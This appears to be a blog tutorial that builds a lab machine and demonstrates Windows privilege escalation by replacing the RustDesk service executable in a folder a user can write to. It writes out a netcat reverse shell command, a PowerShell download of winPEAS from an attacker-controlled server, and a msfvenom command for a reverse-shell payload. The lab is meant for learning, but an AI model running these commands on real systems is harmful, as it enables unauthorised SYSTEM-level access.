Windows Privilege Escalation — Service directory write based privesc

Service directory write based privesc

Before exploiting the service, we will create the vulnerable machine ourselves and perform the exploit.

Let’s Start

Install any Remote desktop application, We will install “RustDesk” application, run the application once and close it.

Lets check for any normal user account.

$net user

Then checking if the “test” user is part of any administrative group or not. “test” user should not be the part of administrative group.

$net user test

Give permission to that user from which you want to perform privilege escalation.

Here we will give permission to “test” user.

Right Click on RustDesk folder → Security → Edit → Add → Advance → Find Now → Select "test" user

Giving “test” user full rights.

Now “test” user have service directory write permission.

Now the setup part is complete.

Initial Access

Open command prompt with “test” user.

Locate the Netcat executable in your machine.

Let’s throw a shell using netcat.

Assume like that we exploited one service and we got the initial shell

$nc.exe -e cmd.exe <ip_address> <port_number>

Let’s perform the window privilege escalation attack

(Service directory write based privesc )

Successfully got the initial shell

Now the question comes , when you have the initial shell what will you do in windows operating system.

The first thing is to upload winpeas without thinking twice.

Start a python server , and download winpeas in window’s system.

$powershell -c wget http://192.168.29.219:8001/winPEASx64.exe -OutFile win.exe

Now run the winpeas i.e., downloaded in the system.

Here we are totally interested in “Installed Application [All Access]”

AUTO_START — As soon as system boots/restart the service will also restart.
BINARY_PATH_GROP — Service executable path.

SERVICE_START_NAME is LocalSystem which means service is running from highest privilege.

Here we cannot start/stop the service.

But we can write in service executable directory.

So, let’s generate a payload from “msfvenom”.

$msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.29.219 lport=5000 -f exe > shell.exe

We will write the above payload to RustDesk executable.

Now the question comes how do we start the service???

We tried similar method from previous exploit to restart the service but our access is denied.

https://medium.com/@anandnikhil33/windows-privilege-escalation-8214ceaf4db8

As, we noticed that service is in AUTO_START mode

Let’s check that if we have rights to restart the system

In below poc “SeSutdownPrivilege” its showing Disabled , but it is enabled by default , so ignore that.

Navigate to the “RustDesk” executable path.

We will download the above payload to RustDesk executable directory.

Whenever any service is in running condition , and its executable is in use , and if you try to write anything then it will prompt “The process cannot access the file because it is being used by another process.”

Now we will use “rename” , we have renamed our executable.

Notice that now we don’t have any file with name “rustdesk.exe”

Copy shell.exe in name of ruskdesk.exe and if anyone will use this file again we will get reverse shell.

This is the method we have to follow in service directory write based privesc

We have renamed the running service executable, and write our file in place of that

Now “Rustdesk” official path is our malicious executable file

How to take advantage of this?

We have to reboot the system

Rebooting the system

Got the shell successfully by replacing service executable with reverse shell payload and restaring the service.